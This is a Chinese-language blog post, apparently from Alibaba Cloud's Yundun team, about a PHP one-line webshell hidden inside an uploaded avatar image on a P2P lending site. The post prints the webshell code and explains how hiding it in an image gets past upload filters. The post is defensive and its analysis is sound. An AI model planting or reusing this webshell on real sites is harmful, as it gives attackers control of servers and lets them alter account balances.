599
P2P網貸網站上的魔術師和他命途多舛的馬兒
安全圈的一位高人曾經說過,攻擊就是一種“魔術”。有趣的是,我在某P2P網貸平台上,還真看到了被憑空“變”出來的錢。
P2P貸款是當下一種比較方便和實用的融資手段,為很多中小融資者解決了燃眉之急。P2P普遍的模式是由中間人提供牽線搭橋的平台,一邊是有資金希望通過貸款讓別人獲取收益,另一邊是有借款需求的人,雙方通過中間人這個平台完成貸款交易。中間人一方麵對雙方背景進行確認,另一方麵保證借貸業務的安全進行。P2P網貸就是依托網絡即線上平台進行的P2P交易。
顯而易見,P2P貸款業務過程中,由於涉及金錢交易,安全是非常重要的:貸出的一方需要確認借貸一方是誠信和可靠的,而借貸的一方需要確保整個借貸過程的安全,可以踏踏實實地拿到自己所需的資金。因此,作為交易中間人的P2P平台能否保證交易的安全就顯得至關重要了。
一談到P2P貸款的安全,公眾的視線立刻就會被聚焦到交易雙方的安全上,能否安全地完成信貸交易是大家最關心的。然而,P2P業務中關鍵的中間方即交易平台利益的保護,往往被大家所忽略。特別是對於一個網貸平台來說,尤是如此。
交易平台怎麼可能利益受損?隻要不存在欺詐行為,也就是多掙點、少掙點手續費的問題啊!對於一個P2P網貸平台來說,在正常的網絡交易環境下,的確是這樣。然而,由於網貸平台交易的特殊性——引入互聯網絡這個因素,使得交易環境變得比較複雜,容易受到其他因素的影響。
在互聯網環境下的P2P網貸業務,和傳統線下業務不一樣的是,很可能出現除了交易雙方、中間平台之外的第四者——攻擊者。這個攻擊者不請自來,而且他趨利性的目的往往比P2P貸款業務中的其他三方都更強烈和不擇手段。
故事開始了。現在我們站在一個攻擊者的角度上看P2P網貸業務,P2P業務交易雙方固然是不錯的攻擊目標;然而,作為一個有經驗的黑客來說,他很可能會選擇中間人,即P2P網站平台。眾所周知,P2P網貸業務追求的最終目的是多贏。如果攻擊者摻合進來,就完全不同了——攻擊者一旦獲益,必然意味著正常P2P業務中的一方或多方利益受損。
平台業務中斷和用戶信息泄漏可能是大家最容易想到的業務威脅。網站被DDoS了,用戶數據庫被脫庫了,這樣的事件的確屢見報端。然而,P2P網貸平台是一個互聯網金融平台,通俗一點說,是玩兒錢的。黑客一旦選擇P2P網貸平台作為攻擊對象,其目標往往不再單純的是拒絕服務和用戶信息的竊取,而是平台上的錢。
故事開始變得有意思了。安全圈有這麼一句著名的話:Bad guy goes for where the money is (壞蛋總是跟著錢跑)。談到P2P平台上的錢,交易雙方賬戶裏的錢無疑是最大的目標。
沒錯,賬戶裏的錢。賬戶裏的錢就是誘惑,是一座金山。
我這裏有一個問題,賬戶裏的錢從哪裏來?這個貌似愚蠢的問題可能會被人笑話——當然是交易來的,要不就是充進去的,難道還是變出來的不成?
安全圈的一位高人曾經說過,攻擊就是一種“魔術”。如果攻擊者是一位“魔術師”呢?那麼這賬戶裏的錢怎麼就不能變出來?
有趣的是,我在某P2P網貸平台上,還真看到了被憑空“變”出來的錢。下麵的內容可能有些枯燥,不過,我盡量用人類的語言把它講的通俗易懂。
如果我說上麵的一大堆太空文字實際上一個圖片,你會不會打我?不過,它的確是一個圖片,那一大堆的亂碼是編碼後的圖片代碼。這個圖片是由某位“魔術師”上傳到某網貸平台上的頭像。
看到最上麵那段簡短的文字了嗎——<?php @eval($_POST['pass']);?>?稍微有些攻防基礎的同學定會開心一笑:這不就是木馬嗎?沒錯兒,一句話木馬。
這裏順帶普及一下什麼是木馬。木馬也叫後門,也稱Webshell,“Web”是指開放web服務的網站服務器,“shell”意指黑客的目標,也就是取得對服務器某種程度上的操作權限。Webshell通常被稱為攻擊者通過端口獲取網站服務器某種程度上的操作權限。Webshell大多為動態腳本文件,也被稱為網站後門工具。
我們上麵看到的就是php木馬,精準一點說,php一句話圖片馬。這個馬兒有什麼用呢?廢話少說,這個馬兒一旦被攻擊者上傳到web服務器上,就可以幫助黑客獲得web服務器控製權限。如果黑客通過這個馬兒讀取到數據庫的連接文件,那麼,你的數據庫就是他的了。
故事到現在進入高潮。數據庫丟了,那就是用戶信息泄漏了?拜托,對於一個P2P網貸網站,人家費那麼大勁(其實不用太費力氣)就是為了那些用戶信息?當然不是,他可以隨意修改自己賬戶的金額,1百,1千,1萬,10萬。。。然後轉賬或提現。
到了見證“奇跡”的時刻:攻擊者“變”出了錢,而網貸網站所有者最終要為這個“奇跡”埋單。在本文開始的時候,我們提到由於互聯網環境的特殊性,作為網貸平台的中間人利益可能因網絡攻擊而遭受損失。上麵的故事即提供了真實寫照。
有的朋友會問,你這是在編故事嗎?還真不是。上麵的圖片是前不久在阿裏雲某網貸網站上截獲的真實馬兒。攻擊者自認為可以像繞過傳統防護係統一樣繞過阿裏雲的防護,上傳馬兒,不想卻被雲盾的服務器防護引擎發現,立刻報警。然後,我們就得到了這個馬兒。之後,我們通過客服係統迅速通知了該網站的管理者,並提供了解決方案。
從攻擊角度上來說,在此次攻擊中,攻擊者最大的“亮點”是把木馬“放到”了圖片裏。攻擊者這麼做的目的就是繞過防護。傳統的手段往往是對腳本代碼進行過濾和檢查,對於上傳的圖片很難做內容核查,往往隻是通過文件頭判斷是否是圖片。如果通過文件頭判斷是圖片,那麼就默認放過。不想馬兒命途多舛,雲盾在服務器係統層麵的防護引擎憑借腳本防護規則準確發現並定位了這個木馬。
“魔術師”機關算盡,無奈馬兒最終沒能逃出雲盾的“手掌心”。P2P網貸網站所有者的利益得到了保護。
“魔術師和馬兒”的故事到這裏就要結束了。然而,攻擊者和防護者圍繞互聯網金融的攻防大戰卻剛剛開始。P2P網貸和互聯網金融正在迅勐發展,其間攻擊者與網站防護者之間的攻防博弈還將繼續。阿裏雲雲盾也將不斷麵對攻擊者的挑戰。不過,這麵經過十年打造的防護之盾必將在不斷進行的攻防大戰中變得更加牢固和強大。
最後更新:2017-04-03 05:39:36